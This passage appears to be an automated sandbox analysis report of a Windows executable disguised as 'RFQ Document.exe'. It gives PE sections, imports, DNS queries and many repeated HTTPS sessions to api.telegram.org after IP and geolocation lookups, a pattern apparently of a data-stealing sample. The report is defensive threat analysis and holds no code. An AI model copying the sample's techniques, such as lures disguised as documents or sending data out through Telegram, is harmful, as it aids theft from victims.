                                            .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc0x370000x42280x4400False0.263097426471data4.96300175496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x371f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4293454056, next used block 4294967295EnglishUnited States
                                            RT_ICON0x397980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4292532954, next used block 4292532954EnglishUnited States
                                            RT_ICON0x3a8400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                            RT_DIALOG0x3aca80x100dataEnglishUnited States
                                            RT_DIALOG0x3ada80x11cdataEnglishUnited States
                                            RT_DIALOG0x3aec80x60dataEnglishUnited States
                                            RT_GROUP_ICON0x3af280x30dataEnglishUnited States
                                            RT_MANIFEST0x3af580x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                            Imports

                                            DLLImport
                                            KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                            USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                            ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 28, 2021 07:58:04.964962959 CEST4977380192.168.2.4132.226.8.169
                                            Sep 28, 2021 07:58:05.230807066 CEST8049773132.226.8.169192.168.2.4
                                            Sep 28, 2021 07:58:05.232337952 CEST4977380192.168.2.4132.226.8.169
                                            Sep 28, 2021 07:58:05.232361078 CEST4977380192.168.2.4132.226.8.169
                                            Sep 28, 2021 07:58:05.499475956 CEST8049773132.226.8.169192.168.2.4
                                            Sep 28, 2021 07:58:05.499944925 CEST8049773132.226.8.169192.168.2.4
                                            Sep 28, 2021 07:58:05.592782021 CEST4977380192.168.2.4132.226.8.169
                                            Sep 28, 2021 07:58:05.596322060 CEST4977380192.168.2.4132.226.8.169
                                            Sep 28, 2021 07:58:05.864909887 CEST8049773132.226.8.169192.168.2.4
                                            Sep 28, 2021 07:58:06.013809919 CEST4977380192.168.2.4132.226.8.169
                                            Sep 28, 2021 07:58:06.751085997 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:06.751137972 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:06.751235008 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:06.814481020 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:06.814506054 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:06.857985020 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:06.858104944 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:06.862571001 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:06.862590075 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:06.862875938 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:06.905411005 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:08.310857058 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:08.351151943 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:08.360182047 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:08.360292912 CEST44349774172.67.188.154192.168.2.4
                                            Sep 28, 2021 07:58:08.360359907 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:08.362340927 CEST49774443192.168.2.4172.67.188.154
                                            Sep 28, 2021 07:58:09.607271910 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.607322931 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.607420921 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.608319998 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.608341932 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.676004887 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.676119089 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.680505991 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.680532932 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.680919886 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.684824944 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.727150917 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.727274895 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.727293015 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.873284101 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.873378992 CEST44349775149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:09.873429060 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:09.874667883 CEST49775443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.067161083 CEST49776443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.067218065 CEST44349776149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.067605019 CEST49776443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.074578047 CEST49776443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.074609995 CEST44349776149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.145684958 CEST44349776149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.152025938 CEST49776443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.152057886 CEST44349776149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.155137062 CEST49776443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.155153036 CEST44349776149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.256720066 CEST44349776149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.263416052 CEST44349776149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.264997959 CEST49776443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.265022039 CEST49776443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.267515898 CEST49777443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.267553091 CEST44349777149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.273113966 CEST49777443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.273153067 CEST49777443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.273163080 CEST44349777149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.337280989 CEST44349777149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.344814062 CEST49777443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.344851971 CEST44349777149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.345035076 CEST49777443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.345047951 CEST44349777149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.447145939 CEST44349777149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.447231054 CEST44349777149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.449970961 CEST49778443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.450018883 CEST44349778149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.450021982 CEST49777443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.450061083 CEST49777443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.450160980 CEST49778443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.450803041 CEST49778443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.450824022 CEST44349778149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.507325888 CEST44349778149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.511324883 CEST49778443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.511378050 CEST44349778149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.511537075 CEST49778443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.511548042 CEST44349778149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.619339943 CEST44349778149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.621088982 CEST44349778149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.624315977 CEST49779443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.624375105 CEST44349779149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.624380112 CEST49778443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.624412060 CEST49778443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.625164986 CEST49779443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.625204086 CEST49779443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.625214100 CEST44349779149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.695027113 CEST44349779149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.699064970 CEST49779443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.699088097 CEST44349779149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.700334072 CEST49779443192.168.2.4149.154.167.220
                                            Sep 28, 2021 07:58:21.700346947 CEST44349779149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.807482958 CEST44349779149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.807571888 CEST44349779149.154.167.220192.168.2.4
                                            Sep 28, 2021 07:58:21.807687998 CEST49779443192.168.2.4149.154.167.220

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Sep 28, 2021 07:57:49.904905081 CEST5745853192.168.2.48.8.8.8
                                            Sep 28, 2021 07:57:49.931982040 CEST53574588.8.8.8192.168.2.4
                                            Sep 28, 2021 07:57:49.985832930 CEST5057953192.168.2.48.8.8.8
                                            Sep 28, 2021 07:57:50.002543926 CEST53505798.8.8.8192.168.2.4
                                            Sep 28, 2021 07:57:50.034183979 CEST5170353192.168.2.48.8.8.8
                                            Sep 28, 2021 07:57:50.056436062 CEST53517038.8.8.8192.168.2.4
                                            Sep 28, 2021 07:57:50.175209045 CEST6524853192.168.2.48.8.8.8
                                            Sep 28, 2021 07:57:50.195456982 CEST53652488.8.8.8192.168.2.4
                                            Sep 28, 2021 07:57:50.407475948 CEST5372353192.168.2.48.8.8.8
                                            Sep 28, 2021 07:57:50.426398993 CEST53537238.8.8.8192.168.2.4
                                            Sep 28, 2021 07:57:52.086497068 CEST6464653192.168.2.48.8.8.8
                                            Sep 28, 2021 07:57:52.121588945 CEST53646468.8.8.8192.168.2.4
                                            Sep 28, 2021 07:57:57.747876883 CEST6529853192.168.2.48.8.8.8
                                            Sep 28, 2021 07:57:57.775429964 CEST53652988.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:04.842756987 CEST5912353192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:04.861382961 CEST53591238.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:04.877244949 CEST5453153192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:04.894201994 CEST53545318.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:06.725596905 CEST4971453192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:06.747652054 CEST53497148.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:09.587006092 CEST5802853192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:09.605787039 CEST53580288.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:27.446319103 CEST5309753192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:27.478327036 CEST53530978.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:45.119631052 CEST4925753192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:45.140292883 CEST53492578.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:48.356383085 CEST6238953192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:48.390084028 CEST53623898.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:48.893975019 CEST4991053192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:48.946300030 CEST53499108.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:49.473862886 CEST5585453192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:49.493026972 CEST53558548.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:49.798865080 CEST6454953192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:49.826356888 CEST53645498.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:49.861587048 CEST6315353192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:49.880759954 CEST53631538.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:50.359217882 CEST5299153192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:50.384278059 CEST53529918.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:50.817967892 CEST5370053192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:50.849745989 CEST53537008.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:51.399735928 CEST5172653192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:51.422228098 CEST53517268.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:52.125528097 CEST5679453192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:52.145600080 CEST53567948.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:53.423222065 CEST5653453192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:53.442584038 CEST53565348.8.8.8192.168.2.4
                                            Sep 28, 2021 07:58:53.938031912 CEST5662753192.168.2.48.8.8.8
                                            Sep 28, 2021 07:58:53.955471992 CEST53566278.8.8.8192.168.2.4
                                            Sep 28, 2021 07:59:02.302161932 CEST5662153192.168.2.48.8.8.8
                                            Sep 28, 2021 07:59:02.329798937 CEST53566218.8.8.8192.168.2.4
                                            Sep 28, 2021 07:59:02.414984941 CEST6311653192.168.2.48.8.8.8
                                            Sep 28, 2021 07:59:02.449933052 CEST53631168.8.8.8192.168.2.4
                                            Sep 28, 2021 07:59:09.014121056 CEST6407853192.168.2.48.8.8.8
                                            Sep 28, 2021 07:59:09.037537098 CEST53640788.8.8.8192.168.2.4
                                            Sep 28, 2021 07:59:37.151129007 CEST6480153192.168.2.48.8.8.8
                                            Sep 28, 2021 07:59:37.179333925 CEST53648018.8.8.8192.168.2.4
                                            Sep 28, 2021 07:59:37.944013119 CEST6172153192.168.2.48.8.8.8
                                            Sep 28, 2021 07:59:37.971066952 CEST53617218.8.8.8192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Sep 28, 2021 07:57:50.034183979 CEST192.168.2.48.8.8.80x7312Standard query (0)clientconfig.passport.netA (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.842756987 CEST192.168.2.48.8.8.80xc16aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.877244949 CEST192.168.2.48.8.8.80xbd0cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:06.725596905 CEST192.168.2.48.8.8.80x87d7Standard query (0)freegeoip.appA (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:09.587006092 CEST192.168.2.48.8.8.80x505fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Sep 28, 2021 07:57:50.056436062 CEST8.8.8.8192.168.2.40x7312No error (0)clientconfig.passport.netauthgfx.msa.akadns6.netCNAME (Canonical name)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.861382961 CEST8.8.8.8192.168.2.40xc16aNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:04.894201994 CEST8.8.8.8192.168.2.40xbd0cNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:06.747652054 CEST8.8.8.8192.168.2.40x87d7No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:06.747652054 CEST8.8.8.8192.168.2.40x87d7No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                            Sep 28, 2021 07:58:09.605787039 CEST8.8.8.8192.168.2.40x505fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • freegeoip.app
                                            • api.telegram.org
                                            • checkip.dyndns.org

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.449774172.67.188.154443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.449775149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            10192.168.2.449784149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            100192.168.2.449876149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            101192.168.2.449877149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            102192.168.2.449878149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            103192.168.2.449879149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            104192.168.2.449880149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            105192.168.2.449881149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            106192.168.2.449882149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            107192.168.2.449883149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            108192.168.2.449884149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            109192.168.2.449885149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            11192.168.2.449785149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            110192.168.2.449886149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            111192.168.2.449887149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            112192.168.2.449888149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            113192.168.2.449910149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            114192.168.2.449913149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            115192.168.2.449914149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            116192.168.2.449915149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            117192.168.2.449916149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            118192.168.2.449917149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            119192.168.2.449918149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            12192.168.2.449786149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            120192.168.2.449919149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            121192.168.2.449920149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            122192.168.2.449921149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            123192.168.2.449922149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            124192.168.2.449923149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            125192.168.2.449924149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            126192.168.2.449925149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            127192.168.2.449926149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            128192.168.2.449927149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            129192.168.2.449928149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            13192.168.2.449787149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            130192.168.2.449929149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            131192.168.2.449930149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            132192.168.2.449931149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
